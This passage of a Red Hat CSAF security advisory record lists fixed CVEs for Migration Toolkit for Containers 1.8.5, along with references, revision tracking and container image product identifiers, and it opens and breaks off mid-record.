"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "body-parser: Denial of Service Vulnerability in body-parser", }, ], }
rhsa-2024:10906
Vulnerability from csaf_redhat
Published
2024-12-10 01:37
Modified
2025-04-10 05:29
Summary
Red Hat Security Advisory: Migration Toolkit for Containers (MTC) 1.8.5 security and bug fix update
Notes
Topic
The Migration Toolkit for Containers (MTC) 1.8.5 is now available.
Red Hat Product Security has rated this update as having a security impact
of Important. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.
Details
The Migration Toolkit for Containers (MTC) enables you to migrate Kubernetes resources, persistent volume data, and internal container images between OpenShift Container Platform clusters, using the MTC web console or the Kubernetes API.
Security Fix(es) from Bugzilla:
* encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion (CVE-2024-34156)
* body-parser: Denial of Service Vulnerability in body-parser (CVE-2024-45590)
* golang: net/netip: Unexpected behavior from Is methods for IPv4-mapped IPv6 addresses (CVE-2024-24790)
* net/http: Denial of service due to improper 100-continue handling in net/http (CVE-2024-24791)
* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)
* go/parser: golang: Calling any of the Parse functions containing deeply nested literals can cause a panic/stack exhaustion (CVE-2024-34155)
* go/build/constraint: golang: Calling Parse on a "// +build" build tag line with deeply nested expressions can cause a panic due to stack exhaustion (CVE-2024-34158)
* path-to-regexp: Backtracking regular expressions cause ReDoS (CVE-2024-45296)
* express: Improper Input Handling in Express Redirects (CVE-2024-43796)
* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)
* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)
For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "The Migration Toolkit for Containers (MTC) 1.8.5 is now available.\n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section.", title: "Topic", }, { category: "general", text: "The Migration Toolkit for Containers (MTC) enables you to migrate Kubernetes resources, persistent volume data, and internal container images between OpenShift Container Platform clusters, using the MTC web console or the Kubernetes API.\n\nSecurity Fix(es) from Bugzilla:\n\n* encoding/gob: golang: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion (CVE-2024-34156)\n\n* body-parser: Denial of Service Vulnerability in body-parser (CVE-2024-45590)\n\n* golang: net/netip: Unexpected behavior from Is methods for IPv4-mapped IPv6 addresses (CVE-2024-24790)\n\n* net/http: Denial of service due to improper 100-continue handling in net/http (CVE-2024-24791)\n\n* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)\n\n* go/parser: golang: Calling any of the Parse functions containing deeply nested literals can cause a panic/stack exhaustion (CVE-2024-34155)\n\n* go/build/constraint: golang: Calling Parse on a \"// +build\" build tag line with deeply nested expressions can cause a panic due to stack exhaustion (CVE-2024-34158)\n\n* path-to-regexp: Backtracking regular expressions cause ReDoS (CVE-2024-45296)\n\n* express: Improper Input Handling in Express Redirects (CVE-2024-43796)\n\n* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)\n\n* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2024:10906", url: "https://access.redhat.com/errata/RHSA-2024:10906", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#important", url: "https://access.redhat.com/security/updates/classification/#important", }, { category: "external", summary: "2292787", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2292787", }, { category: "external", summary: "2295310", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2295310", }, { category: "external", summary: "2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "2310527", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310527", }, { category: "external", summary: "2310528", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310528", }, { category: "external", summary: "2310529", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310529", }, { category: "external", summary: "2310908", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310908", }, { category: "external", summary: "2311152", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311152", }, { category: "external", summary: "2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "external", summary: "2311171", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311171", }, { category: "external", summary: "MIG-1458", url: "https://issues.redhat.com/browse/MIG-1458", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_10906.json", }, ], title: "Red Hat Security Advisory: Migration Toolkit for Containers (MTC) 1.8.5 security and bug fix update", tracking: { current_release_date: "2025-04-10T05:29:15+00:00", generator: { date: "2025-04-10T05:29:15+00:00", engine: { name: "Red Hat SDEngine", version: "4.4.2", }, }, id: "RHSA-2024:10906", initial_release_date: "2024-12-10T01:37:19+00:00", revision_history: [ { date: "2024-12-10T01:37:19+00:00", number: "1", summary: "Initial version", }, { date: "2024-12-10T01:37:19+00:00", number: "2", summary: "Last updated version", }, { date: "2025-04-10T05:29:15+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "8Base-RHMTC-1.8", product: { name: "8Base-RHMTC-1.8", product_id: "8Base-RHMTC-1.8", product_identification_helper: { cpe: "cpe:/a:redhat:rhmt:1.8::el8", }, }, }, ], category: "product_family", name: "Red Hat Migration Toolkit", }, { branches: [ { category: "product_version", name: "rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", product: { name: "rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", product_id: "rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", product_identification_helper: { purl: "pkg:oci/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319?arch=amd64&repository_url=registry.redhat.io/rhmtc/openshift-migration-controller-rhel8&tag=v1.8.5-11", }, }, }, { category: "product_version", name: "rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", product: { name: "rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", product_id: "rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", product_identification_helper: { purl: "pkg:oci/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc?arch=amd64&repository_url=registry.redhat.io/rhmtc/openshift-migration-hook-runner-rhel8&tag=v1.8.5-8", }, }, }, { category: "product_version", name: "rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", product: { name: "rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", product_id: "rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", product_identification_helper: { purl: "pkg:oci/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed?arch=amd64&repository_url=registry.redhat.io/rhmtc/openshift-migration-log-reader-rhel8&tag=v1.8.5-8", }, }, }, { category: "product_version", name: "rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", product: { name: "rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", product_id: "rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", product_identification_helper: { purl: "pkg:oci/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb?arch=amd64&repository_url=registry.redhat.io/rhmtc/openshift-migration-must-gather-rhel8&tag=v1.8.5-9", }, }, }, { category: "product_version", name: "rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", product: { name: "rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", product_id: "rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", product_identification_helper: { purl: "pkg:oci/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf?arch=amd64&repository_url=registry.redhat.io/rhmtc/openshift-migration-openvpn-rhel8&tag=v1.8.5-6", }, }, }, { category: "product_version", name: "rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", product: { name: "rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", product_id: "rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", product_identification_helper: { purl: "pkg:oci/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c?arch=amd64&repository_url=registry.redhat.io/rhmtc/openshift-migration-rhel8-operator&tag=v1.8.5-10", }, }, }, { category: "product_version", name: "rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", product: { name: "rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", product_id: "rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", product_identification_helper: { purl: "pkg:oci/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb?arch=amd64&repository_url=registry.redhat.io/rhmtc/openshift-migration-operator-bundle&tag=v1.8.5-16", }, }, }, { category: "product_version", name: "rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", product: { name: "rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", product_id: "rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", product_identification_helper: { purl: "pkg:oci/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007?arch=amd64&repository_url=registry.redhat.io/rhmtc/openshift-migration-registry-rhel8&tag=v1.8.5-6", }, }, }, { category: "product_version", name: "rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", product: { name: "rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", product_id: "rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", product_identification_helper: { purl: "pkg:oci/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31?arch=amd64&repository_url=registry.redhat.io/rhmtc/openshift-migration-rsync-transfer-rhel8&tag=v1.8.5-7", }, }, }, { category: "product_version", name: "rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", product: { name: "rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", product_id: "rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", product_identification_helper: { purl: "pkg:oci/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47?arch=amd64&repository_url=registry.redhat.io/rhmtc/openshift-migration-ui-rhel8&tag=v1.8.5-7", }, }, }, { category: "product_version", name: "rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", product: { name: "rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", product_id: "rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", product_identification_helper: { purl: "pkg:oci/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b?arch=amd64&repository_url=registry.redhat.io/rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8&tag=v1.8.5-6", }, }, }, ], category: "architecture", name: "amd64", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64 as a component of 8Base-RHMTC-1.8", product_id: "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", }, product_reference: "rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", relates_to_product_reference: "8Base-RHMTC-1.8", }, { category: "default_component_of", full_product_name: { name: "rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64 as a component of 8Base-RHMTC-1.8", product_id: "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", }, product_reference: "rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", relates_to_product_reference: "8Base-RHMTC-1.8", }, { category: "default_component_of", full_product_name: { name: "rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64 as a component of 8Base-RHMTC-1.8", product_id: "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", }, product_reference: "rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", relates_to_product_reference: "8Base-RHMTC-1.8", }, { category: "default_component_of", full_product_name: { name: "rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64 as a component of 8Base-RHMTC-1.8", product_id: "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", }, product_reference: "rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", relates_to_product_reference: "8Base-RHMTC-1.8", }, { category: "default_component_of", full_product_name: { name: "rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64 as a component of 8Base-RHMTC-1.8", product_id: "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", }, product_reference: "rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", relates_to_product_reference: "8Base-RHMTC-1.8", }, { category: "default_component_of", full_product_name: { name: "rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64 as a component of 8Base-RHMTC-1.8", product_id: "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", }, product_reference: 